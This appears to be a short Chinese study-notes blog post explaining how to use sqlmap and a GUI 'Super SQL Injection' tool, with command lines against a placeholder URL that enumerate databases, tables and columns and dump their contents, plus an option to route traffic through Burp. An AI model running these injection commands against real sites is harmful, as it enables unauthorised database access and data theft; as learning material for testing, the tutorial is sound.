Cyber Security-Day9(sqlmap和超级sql使用)
1.sqlmap的使用
python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U --dbs
-u 指定地址
--batch 测试过程中, 执行所有默认配置
--technique= (默认全部使用)
B 基于布尔的盲注
T 基于时间的盲注
E 基于报错的注入
U 基于UNION查询注入
S 基于多语句查询注入
—dbs 所有的数据库
看到所有的库我们指定库去查找所有的表
python sqlmap.py -u "http://xxxxxx.php?id=*7" --batch --random-agent --technique U -d db_math4a11 --tables
—tables 所有的表
接下来根据表去查找列,根据列去查找值
python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES --columns
python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES -C ENGINE --dump
如果需要配置BP,使我们可以看到抓包输入的值,GET POST请求,最后加
--proxy https://127.0.0.1:1080
2.超级SQL注入的使用
(1)填入URL
(2)转换为GET或者POST
(3)识别注入
(4)注入完毕,我们去查看注入记录,以及在数据中心设置环境变量,然后去查库,表,列,数值
本文作者:Arrest
本文链接:https://www.cnblogs.com/arrest/p/16449135.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步